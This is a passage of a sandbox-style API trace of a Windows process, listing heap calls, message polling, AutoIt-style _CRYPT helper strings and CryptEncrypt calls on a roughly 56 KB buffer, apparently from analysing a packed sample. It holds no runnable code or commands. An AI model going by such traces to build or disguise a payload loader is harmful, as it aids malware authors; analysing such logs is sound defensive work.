lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0029.691] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.691] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.691] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0029.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0029.691] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0029.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0029.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0029.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0029.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0029.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.694] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.694] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0029.694] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.694] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.694] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.694] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.694] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.695] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.695] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.695] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.695] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.695] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.695] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.695] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.695] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.695] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.695] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.695] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.695] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.695] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.695] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.695] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.695] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.695] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.695] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0029.696] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.696] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.696] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xdc85, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xdc90) returned 1 [0029.696] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.696] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.696] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.696] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.696] CharLowerBuffW (in: lpsz="byte[56465]", cchLength=0xb | out: lpsz="byte[56465]") returned 0xb [0029.696] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.697] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.698] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.698] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.698] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8d9570*, pdwDataLen=0x6ae220*=0xdc85, dwBufLen=0xdc90 | out: pbData=0x8d9570*, pdwDataLen=0x6ae220*=0xdc90) returned 1 [0029.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.698] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0029.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.699] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.699] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.699] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.699] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.699] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.699] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.699] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.699] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.699] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0029.699] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.702] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.702] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.702] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.703] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.703] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.704] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0029.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 